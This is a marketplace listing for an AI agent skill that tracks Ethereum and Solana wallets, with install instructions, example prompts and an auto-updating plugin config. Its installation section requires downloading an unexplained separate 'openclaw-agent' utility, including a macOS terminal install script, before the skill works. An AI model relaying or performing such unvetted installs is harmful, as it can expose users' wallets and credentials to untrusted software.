wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Track blockchain addresses, monitor whale transactions, and analyze portfolio changes in real-time with the OpenClaw wallet-tracker skill for Ethereum and Solana.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-fntdrWhat This Skill Does
The wallet-tracker skill provides a robust framework for monitoring blockchain activity across multiple networks including Ethereum and Solana. By integrating with the openclaw-agent utility, it enables real-time tracking of wallet balances, transaction history, token movements, and significant network events. Users can monitor whale movements, analyze portfolio shifts, and stay informed on NFT and DeFi-related activities through automated scripts and direct API interactions.
Installation
To begin using this skill, ensure you have the OpenClaw environment configured. First, install the skill package using the command: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-fntdr. IMPORTANT: You must install the openclaw-agent utility before executing tracking operations. Windows users can download the agent from the official GitHub repository, while macOS users should follow the terminal-based installation script provided in the documentation. Without this agent, blockchain monitoring features will remain inactive.
Use Cases
This tool is designed for crypto-enthusiasts, researchers, and professional traders. Use cases include:
- Real-time Whale Watching: Get immediate alerts when large transactions occur in monitored wallets.
- Portfolio Monitoring: Keep track of token distribution changes and asset allocation over time.
- NFT Tracking: Detect incoming or outgoing NFT transfers to stay updated on high-value digital asset movement.
- DeFi Integration: Monitor interactions with decentralized finance protocols to track yield farming or lending activities.
- Security Auditing: Track suspicious wallet activity to detect potential vulnerabilities or unauthorized transfers.
Example Prompts
- "Track the Ethereum wallet 0xabc...123 and alert me every time a transaction over 10 ETH occurs."
- "Show me the last 10 ERC-20 token transfers for the address 0xdef...456 and format the output by token symbol."
- "Monitor my Solana wallet address and notify me if there is any change in my SOL balance during the next hour."
Tips & Limitations
- API Limits: Always use valid API keys (like Etherscan keys) to avoid request rate limiting which can stall your tracking tasks.
- Precision: When handling token values, ensure you are dividing by the correct decimal precision as defined by the token's metadata.
- Latency: Real-time monitoring scripts require a persistent connection to the agent and stable internet access. Performance may vary based on blockchain congestion and network node responsiveness.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-fntdr": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.